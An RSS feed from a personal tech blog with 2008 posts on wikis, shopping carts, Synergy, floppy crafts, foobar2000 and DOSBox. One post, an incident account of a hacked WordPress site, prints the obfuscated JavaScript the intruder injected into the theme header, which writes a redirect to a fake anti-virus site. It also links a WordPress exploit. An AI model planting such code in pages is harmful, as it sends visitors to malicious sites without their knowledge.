<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>llynix.com &#187; Tech</title>
	<atom:link href="http://llynix.com/category/articles/tech/feed/" rel="self" type="application/rss+xml" />
	<link>http://llynix.com</link>
	<description>Code, Rants and Ramblings</description>
	<lastBuildDate>Mon, 15 Feb 2010 00:17:54 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.1</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>A Wiki and a Shopping Cart</title>
		<link>http://llynix.com/articles/a-wiki-and-a-shopping-cart/</link>
		<comments>http://llynix.com/articles/a-wiki-and-a-shopping-cart/#comments</comments>
		<pubDate>Mon, 29 Sep 2008 17:00:57 +0000</pubDate>
		<dc:creator>Llynix</dc:creator>
				<category><![CDATA[Articles]]></category>
		<category><![CDATA[Tech]]></category>

		<guid isPermaLink="false">http://llynix.com/?p=90</guid>
		<description><![CDATA[This week I had some good luck installing a few web applications.  The first was a small wiki program called PmWiki.  I was looking for something a little less feature rich then a standard MediaWiki installation.  I really only wanted a single editable wiki page.  PmWiki had more then I wanted [...]]]></description>
			<content:encoded><![CDATA[<p>This week I had some good luck installing a few web applications.  The first was a small wiki program called <a href="http://www.pmwiki.org/">PmWiki</a>.  I was looking for something a little less feature rich then a standard <a href="http://www.mediawiki.org/wiki/MediaWiki">MediaWiki</a> installation.  I really only wanted a single editable wiki page.  PmWiki had more then I wanted but it installed easily and was easy to hack into a simplified state.  I still haven&#8217;t gotten clean URLs to work but that was probably because I didn&#8217;t want to play with my .htaccess late last night.</p>
<p>Next up was <a href="http://www.zencart.com/">Zencart</a>.  Zencart seems to be the premier open source shopping cart system on the web.  I&#8217;ve always wanted to play around with it so I installed the latest stable version and started modifying it and adding my comic book collection.  Zencart installed easily and without problems but stripping it down of the various unneeded buttons and links was a bit time consuming.  Many of the options are hidden in many menus and the process doesn&#8217;t seem very intuitive.  That being said Zencart seemed very feature rich and had everything an online store would need to conduct business on the web.  Setting up the various modules was very easy and soon I had the store accepting paypal via my account and handling shipping accordingly.</p>
<p>I didn&#8217;t get to mess around with templates and zencart as much as I wanted.  Code wise the template seems all over the place and I&#8217;ve already jumped to a half dozen places commenting out portions I didn&#8217;t want.  I probably should have just picked another default template and installed it.</p>
<p>Both programs are free open source, so overall no complaints whatsoever.  If I really had any problems I could just fix them.  Isn&#8217;t open source fun?</p>
]]></content:encoded>
			<wfw:commentRss>http://llynix.com/articles/a-wiki-and-a-shopping-cart/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Bookmark Roundup 3 &#8211; Foursome</title>
		<link>http://llynix.com/articles/bookmark-roundup-3-foursome/</link>
		<comments>http://llynix.com/articles/bookmark-roundup-3-foursome/#comments</comments>
		<pubDate>Sat, 27 Sep 2008 16:34:02 +0000</pubDate>
		<dc:creator>Llynix</dc:creator>
				<category><![CDATA[Articles]]></category>
		<category><![CDATA[Tech]]></category>

		<guid isPermaLink="false">http://llynix.com/?p=104</guid>
		<description><![CDATA[It&#8217;s just getting too much.  I have a ton of tabs open on the ole browser.
Smarty is a template system for the web.  I&#8217;ve been thinking of incorporating it into some of my projects but I know nothing about it.  Anyone used it before?
I filed Issue 362 for SumatraPDF to show my [...]]]></description>
			<content:encoded><![CDATA[<p>It&#8217;s just getting too much.  I have a ton of tabs open on the ole browser.</p>
<p><a href="http://www.smarty.net/">Smarty</a> is a template system for the web.  I&#8217;ve been thinking of incorporating it into some of my projects but I know nothing about it.  Anyone used it before?</p>
<p>I filed <a href="http://code.google.com/p/sumatrapdf/issues/detail?id=362&#038;q=label:Type-Defect">Issue 362</a> for SumatraPDF to show my commitment to updating their installer a bit.  There is already one done at <a href="http://code.google.com/p/sumatrapdf/issues/detail?id=192">Issue 192</a> but it really seems hectic.</p>
<p>Editing the <a href="http://support.microsoft.com/kb/289022">Windows XP Boot Menu</a> seems pretty easy.  Just <a href="http://www.askapache.com/windows/custom-boot-menu-in-windows-xp.html">edit the boot.ini</a>.</p>
<p>I&#8217;ve got a router with <a href="http://www.dd-wrt.com/dd-wrtv3/index.php">DD-WRT</a> setup with <a href="http://www.dnsomatic.com/">DNS-O-Matic</a> so I can filter out certain sites at <a href="http://www.opendns.com/">OpenDNS</a>.  I&#8217;m trying to set up a home.llynix.com address with all that jazz.</p>
]]></content:encoded>
			<wfw:commentRss>http://llynix.com/articles/bookmark-roundup-3-foursome/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Two Computers with Shared Keyboard and Mouse</title>
		<link>http://llynix.com/articles/two-computers-with-shared-keyboard-and-mouse/</link>
		<comments>http://llynix.com/articles/two-computers-with-shared-keyboard-and-mouse/#comments</comments>
		<pubDate>Tue, 26 Aug 2008 17:00:22 +0000</pubDate>
		<dc:creator>Llynix</dc:creator>
				<category><![CDATA[Articles]]></category>
		<category><![CDATA[Tech]]></category>
		<category><![CDATA[Windows]]></category>

		<guid isPermaLink="false">http://llynix.com/?p=103</guid>
		<description><![CDATA[Ok so I totally geeked out over the weekend.  After spending an entire day working on a slipstreamed XP installation and backing up and wiping drives, my family was a little upset at the computer parts strewn across the floor.  Unfortunately I didn&#8217;t have a longer cable so I ended up stretching a [...]]]></description>
			<content:encoded><![CDATA[<p>Ok so I totally geeked out over the weekend.  After spending an entire day working on a slipstreamed XP installation and backing up and wiping drives, my family was a little upset at the computer parts strewn across the floor.  Unfortunately I didn&#8217;t have a longer cable so I ended up stretching a cable as far as I could.  I ended up fixing this issue by <a href="http://llynix.com/articles/windows/bridged-connections-makes-your-laptop-an-internet-provider/">bridging connections</a> and using the wireless on my laptop as an internet connection.  But I knew I needed to take it a step further.</p>
<p>You see I don&#8217;t have a spare mouse and keyboard.  When I&#8217;m working on another computer I simply use the mouse and keys I have tethered to my laptop.  But after I set up the new computer now snug across the room out of the family&#8217;s way I found myself very much wanting a normal mouse and keys for my laptop.</p>
<p>After some searching I came across <a href="http://synergy2.sourceforge.net/">Synergy</a> an open source, multi-platform, network keyboard and mouse sharing program.  Unfortunately it has been out of active development for a couple of years now.  That didn&#8217;t stop it from working like a charm once I had RTFM&#8217;d.</p>
<p>To save you some trouble I&#8217;ll let you in on the gotcha&#8217;s.  Basically what you do is download the Synergy program to each of the computers your going to share.  In my case this new desktop had the keys and mouse connected to it so it was the host computer.  On the host computer you need to configure screens and links.  It&#8217;s a little confusing but once you know the trick it&#8217;s easy.  Synergy identifies computers by their computer names.  So in my case I&#8217;ve got a computer named desktop and one named laptop.  If your not sure of your computers name just right click on My Computer and choose properties.  You&#8217;ll need to add a screen for each computer.  Now once your screens are in place you need to add links.  For my purposes I have a link set up that looks like &#8216;desktop is to the left of laptop&#8217; and another set up that says &#8216;laptop is to the right of desktop&#8217;.</p>
<p>Now if all goes well hit start on the host computer and it should fire up.  Next on the client computer, in this case my laptop load up Synergy and just connect to the host.  You can apparently use the computers name to connect but if that doesn&#8217;t work you can use the local ip address of the host computer.  To easily get this information on the host computer go to a command prompt and type ipconfig.</p>
<p>Hopefully if all went well you should now be able to zonk the mouse all the way to the right and presto.  Your keys and mouse should now work fine on the client computer.  If you have any problems check out this longer tutorial at <a href="http://lifehacker.com/software/dual-monitor/hack-attack-control-multiple-computers-with-a-single-keyboard-and-mouse-254648.php">LifeHacker</a>.</p>
<p>So now I have two computers side by side, sharing internet, mouse and keys.  Pure geek.</p>
]]></content:encoded>
			<wfw:commentRss>http://llynix.com/articles/two-computers-with-shared-keyboard-and-mouse/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Perfect Floppy Box</title>
		<link>http://llynix.com/articles/perfect-floppy-box/</link>
		<comments>http://llynix.com/articles/perfect-floppy-box/#comments</comments>
		<pubDate>Sun, 24 Aug 2008 23:37:08 +0000</pubDate>
		<dc:creator>Llynix</dc:creator>
				<category><![CDATA[Articles]]></category>
		<category><![CDATA[Other]]></category>
		<category><![CDATA[Tech]]></category>

		<guid isPermaLink="false">http://llynix.com/articles/other/perfect-floppy-box/</guid>
		<description><![CDATA[  I&#8217;ve been making these attractive boxes recycled from old floppies for awhile but just recently I figured out the trick to a perfect one.
Each disk has two holes already as long as you click the write protect correctly.  If you look at the bottom of the disk there are two holes that [...]]]></description>
			<content:encoded><![CDATA[<p><a style="float:left;" class="imagelink" href='http://llynix.com/wp-content/uploads/2008/08/p1010017.jpg' title='Completed Floppy Disk Box'><img src='http://llynix.com/wp-content/uploads/2008/08/p1010017.thumbnail.jpg' alt='Completed Floppy Disk Box' /></a>  I&#8217;ve been making these attractive boxes recycled from old floppies for awhile but just recently I figured out the trick to a perfect one.</p>
<p>Each disk has two holes already as long as you click the write protect correctly.  If you look at the bottom of the disk there are two holes that don&#8217;t go completely through the plastic.  Using these as a guide drill them out for four disks.  These make up your sides.  For the bottom use another disk as a template.  The two holes that come naturally on every disk can serve as a guide to drill identically spaced holes at the bottom of a disk.  This should line up perfectly your four sides and then it&#8217;s just a matter of cable tying it together leaving the knot of the cable tie on the inside of the box.</p>
]]></content:encoded>
			<wfw:commentRss>http://llynix.com/articles/perfect-floppy-box/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Gmail as your default mailto with Firefox 3</title>
		<link>http://llynix.com/articles/gmail-as-your-default-mailto-with-firefox-3/</link>
		<comments>http://llynix.com/articles/gmail-as-your-default-mailto-with-firefox-3/#comments</comments>
		<pubDate>Sun, 24 Aug 2008 04:04:43 +0000</pubDate>
		<dc:creator>Llynix</dc:creator>
				<category><![CDATA[Articles]]></category>
		<category><![CDATA[Tech]]></category>

		<guid isPermaLink="false">http://llynix.com/articles/tech/gmail-as-your-default-mailto-with-firefox-3/</guid>
		<description><![CDATA[I found this website which explains exactly how to add support for gmail in Firefox 3.  Hopefully in the future they&#8217;ll include this by default, or perhaps make it easier.
]]></description>
			<content:encoded><![CDATA[<p>I found this website which explains exactly how to <a href="http://mozillalinks.org/wp/2008/07/seamonkey-1110-update-available-now/">add support for gmail in Firefox 3</a>.  Hopefully in the future they&#8217;ll include this by default, or perhaps make it easier.</p>
]]></content:encoded>
			<wfw:commentRss>http://llynix.com/articles/gmail-as-your-default-mailto-with-firefox-3/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Hacked &#8211; Update your Old Software</title>
		<link>http://llynix.com/articles/hacked-update-your-old-software/</link>
		<comments>http://llynix.com/articles/hacked-update-your-old-software/#comments</comments>
		<pubDate>Mon, 21 Jul 2008 17:00:20 +0000</pubDate>
		<dc:creator>Llynix</dc:creator>
				<category><![CDATA[Articles]]></category>
		<category><![CDATA[Tech]]></category>

		<guid isPermaLink="false">http://llynix.com/articles/tech/hacked-update-your-old-software/</guid>
		<description><![CDATA[A few days ago my website OneDittyADay.com was hacked.  I&#8217;m not 100% sure what went down but from what I gather about a week ago he exploited a bug using a script probably similar to this one exploiting Wordpress 2.1.2.  This bug allows access to the md5 hashes of every user.  A [...]]]></description>
			<content:encoded><![CDATA[<p>A few days ago my website <a href="http://onedittyaday.com">OneDittyADay.com</a> was hacked.  I&#8217;m not 100% sure what went down but from what I gather about a week ago he exploited a bug using a script probably similar to this one <a href="http://www.milw0rm.com/exploits/3656">exploiting Wordpress 2.1.2</a>.  This bug allows access to the md5 hashes of every user.  A few days later after cracking Wordpress&#8217; default random password of six lowercase letters and digits he made a very simple edit via the theme-editor to header.php.</p>
<p>In it he included this snippet of code:<br />
<code><br />
&lt;SCRIPT LANGUAGE="JavaScript"&gt;</p>
<p>&lt;!--</p>
<p>function Decode(){var temp="",i,c=0,out="";var str="60!115!99!114!105!112!116!62!32!119!105!110!100!111!119!46!108!111!99!97!116!105!111!110!61!34!104!116!116!112!58!47!47!120!114!108!46!117!115!47!107!107!51!119!54!34!32!60!47!115!99!114!105!112!116!62!";l=str.length;while(c&lt;=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";}document.write(out);}</p>
<p>//--&gt;</p>
<p>&lt;/SCRIPT&gt;&lt;SCRIPT LANGUAGE="JavaScript"&gt;</p>
<p>&lt;!--</p>
<p>Decode();</p>
<p>//--&gt;</p>
<p>&lt;/SCRIPT&gt;<br />
</code></p>
<p>I haven&#8217;t decrypted it to display it&#8217;s contents but I know it&#8217;s just a simple javascript redirect to a rather nasty windows &#8220;anti-virus&#8221; site.  I put that in quotes because it is anything but.  This webpage even caught Firefox in Ubuntu for a loop and took a bit to shut down.</p>
<p>As soon as I found out all of this I reset the password and then upgraded Wordpress to the very latest version.  One thing went wrong with the upgrade.  The categories for some reason didn&#8217;t copy over correctly.  Since I only have a handful of categories I manually updated them but it did take me a few to figure out why my website didn&#8217;t print any articles.</p>
<p>It&#8217;s kind of embarrassing, but I thought I&#8217;d share.  Moral of the story: even on your dead sites, upgrade or go static.</p>
]]></content:encoded>
			<wfw:commentRss>http://llynix.com/articles/hacked-update-your-old-software/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Recycle a Floppy</title>
		<link>http://llynix.com/articles/recycle-a-floppy/</link>
		<comments>http://llynix.com/articles/recycle-a-floppy/#comments</comments>
		<pubDate>Wed, 16 Jul 2008 17:00:53 +0000</pubDate>
		<dc:creator>Llynix</dc:creator>
				<category><![CDATA[Articles]]></category>
		<category><![CDATA[Tech]]></category>

		<guid isPermaLink="false">http://llynix.com/writings/tech/recycle-a-floppy/</guid>
		<description><![CDATA[If your like me you have a few 3 1/4&#8243; Floppy Disks lying around.  Here are a few interesting Ideas:
I like to make pencil holders out of them.
You could try making a Starship Enterprise.
Or a Floppy Disk Bag.
This site shows how to make a notebook out of floppies, but I&#8217;d use cable ties instead [...]]]></description>
			<content:encoded><![CDATA[<p>If your like me you have a few 3 1/4&#8243; Floppy Disks lying around.  Here are a few interesting Ideas:</p>
<p><img src='http://llynix.com/wp-content/uploads/2008/07/p1010017.thumbnail.jpg' alt='Floppy Disk Pencil Holder' style="float:left;padding-right:10px;" />I like to make <a href="http://llynix.com/wp-content/uploads/2008/07/p1010017.jpg">pencil holders</a> out of them.<br />
You could try making a <a href="http://www.asciipr0n.com/archive/0013/bonnie/craft/">Starship Enterprise</a>.<br />
Or a <a href="http://www.instructables.com/id/Floppy-Disk-Bag/">Floppy Disk Bag</a>.<br />
This site shows how to make a <a href="http://www.gearlog.com/2006/10/a_practical_use_for_floppies_t.php">notebook out of floppies</a>, but I&#8217;d use cable ties instead of paper clips.<br />
But if your really good and have a floppy drive lying around.<br />
<object width="425" height="344"><param name="movie" value="http://www.youtube.com/v/X4SCSGRVAQE&#038;hl=en&#038;fs=1"></param><param name="allowFullScreen" value="true"></param><embed src="http://www.youtube.com/v/X4SCSGRVAQE&#038;hl=en&#038;fs=1" type="application/x-shockwave-flash" allowfullscreen="true" width="425" height="344"></embed></object></p>
]]></content:encoded>
			<wfw:commentRss>http://llynix.com/articles/recycle-a-floppy/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Enhance Your Audio Collection With Foobar2000</title>
		<link>http://llynix.com/articles/enhance-your-audio-collection-with-foobar2000/</link>
		<comments>http://llynix.com/articles/enhance-your-audio-collection-with-foobar2000/#comments</comments>
		<pubDate>Mon, 14 Jul 2008 17:00:36 +0000</pubDate>
		<dc:creator>Llynix</dc:creator>
				<category><![CDATA[Articles]]></category>
		<category><![CDATA[Tech]]></category>

		<guid isPermaLink="false">http://llynix.com/writings/tech/enhance-your-audio-collection-with-foobar2000/</guid>
		<description><![CDATA[I took on the task a few days ago to update and upgrade my audio collection with the meta-data I&#8217;ve been striping out all these years.  For the longest time my audio collection was a simple hierarchy of artist&#8217;s names and albums.  I used foobar2000, but only because of it&#8217;s small memory usage.
I [...]]]></description>
			<content:encoded><![CDATA[<p>I took on the task a few days ago to update and upgrade my audio collection with the meta-data I&#8217;ve been striping out all these years.  For the longest time my audio collection was a simple hierarchy of artist&#8217;s names and albums.  I used foobar2000, but only because of it&#8217;s small memory usage.</p>
<p>I started with album covers.  Using a program called <a href="http://team.thenexusnet.com/nexus/AAA/">Album Art Aggregator</a> I downloaded almost every album cover I needed.  The program is fairly simple to use but does require the .NET libraries to run.</p>
<p>I then upgraded to the latest version of <a href="http://www.foobar2000.org/">foobar2000</a> which was 0.9.5.4.</p>
<p>I had the chore of tagging my entire collection.  But foobar has a few features to help out.  Highlight an entire album, right click, then choose Tagging -> Get Tags from freedb.  Hopefully you&#8217;ll be presented with multiple tag sets to choose from.  If one isn&#8217;t found, right click, choose properties and in the Tools menu try out Auto-Fill tags.  Foobar will generate tags for you based of the filename.</p>
<p>If you want to look good <a href="http://yuo.be/columns.php">Columns UI</a> is the way to go.  It&#8217;s a little clunky to figure out at first but this might help, everything to tweak the design seems to be modifiable from File->Preferences then Display->Columns UI choose the second tab Layout.  Play around with your right-click menus in there.</p>
<p>Another big boost is the <a href="http://gro.clinux.org/projects/ikiki/">Lyrics Panel</a>.  This handy plugin automatically downloads lyrics for your songs if it doesn&#8217;t find any.</p>
<p><a href='http://llynix.com/wp-content/uploads/2008/07/foobar_setup.jpg' title='My Foobar2000 Setup' style="float:left;" class="imagelink"><img src='http://llynix.com/wp-content/uploads/2008/07/foobar_setup.jpg' alt='My Foobar2000 Setup' style="width:450px;" /></a>My Foobar2000 Setup.</p>
]]></content:encoded>
			<wfw:commentRss>http://llynix.com/articles/enhance-your-audio-collection-with-foobar2000/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Dosbox</title>
		<link>http://llynix.com/articles/dosbox/</link>
		<comments>http://llynix.com/articles/dosbox/#comments</comments>
		<pubDate>Sat, 12 Jul 2008 17:00:57 +0000</pubDate>
		<dc:creator>Llynix</dc:creator>
				<category><![CDATA[Articles]]></category>
		<category><![CDATA[Tech]]></category>

		<guid isPermaLink="false">http://llynix.com/writings/tech/dosbox/</guid>
		<description><![CDATA[Dosbox is an open source x86 emulator with DOS.  What that essentially means is it makes the really really old DOS stuff you have lying around run even though Windows scoffs at it.
I had the opportunity to play around with it recently and I must say I&#8217;m impressed by its simplicity.  Just download [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.dosbox.com/">Dosbox</a> is an open source x86 emulator with DOS.  What that essentially means is it makes the really really old DOS stuff you have lying around run even though Windows scoffs at it.</p>
<p>I had the opportunity to play around with it recently and I must say I&#8217;m impressed by its simplicity.  Just download and install.  Then the only hurdle is mounting your old files like this:</p>
<p><code>MOUNT C D:\My Old Dos Games</code></p>
<p>Now just zip over to them using <a href="http://help.rnrtech.com/DOS_commands_quickref.html">DOS commands</a> and run like normal.  If you want full screen hit ALT+Enter.</p>
<p>I&#8217;ve got The Bard&#8217;s Tale and its sequel sitting on my desk.  Can&#8217;t wait to hook up the old computer with a disk drive.</p>
]]></content:encoded>
			<wfw:commentRss>http://llynix.com/articles/dosbox/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Security Snafu Two</title>
		<link>http://llynix.com/articles/security-snafu-two/</link>
		<comments>http://llynix.com/articles/security-snafu-two/#comments</comments>
		<pubDate>Fri, 11 Jul 2008 17:00:54 +0000</pubDate>
		<dc:creator>Llynix</dc:creator>
				<category><![CDATA[Articles]]></category>
		<category><![CDATA[Tech]]></category>

		<guid isPermaLink="false">http://llynix.com/writings/tech/security-snafu-two/</guid>
		<description><![CDATA[Another one from the company my girl works for.
Customers are able to password protect their accounts in order to prevent social engineering attempts and such.  Usually this process goes as well as normal passwords go.  However in this case if the customer doesn&#8217;t happen to have their password they need to go out [...]]]></description>
			<content:encoded><![CDATA[<p>Another one from the company my girl works for.</p>
<p>Customers are able to password protect their accounts in order to prevent social engineering attempts and such.  Usually this process goes as well as normal passwords go.  However in this case if the customer doesn&#8217;t happen to have their password they need to go out of their way to a store and verify their ID to get it changed.</p>
<p>Many times representatives for the company are forced to send a customer to the store even though clearly the mistake was the companies.</p>
<p>You see the password field the representative had to type in had no confirmation field.  Sometimes a speedy rep would race through the form and be off in filing it out.  As a result the date or an odd account number would end up as the password instead of what the customer requested.</p>
<p>This error has been fixed recently.  But the lesson is clear:  ALWAYS double verify new passwords.  Even more so if your expecting your customers to jump through several hoops to reset it.</p>
]]></content:encoded>
			<wfw:commentRss>http://llynix.com/articles/security-snafu-two/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

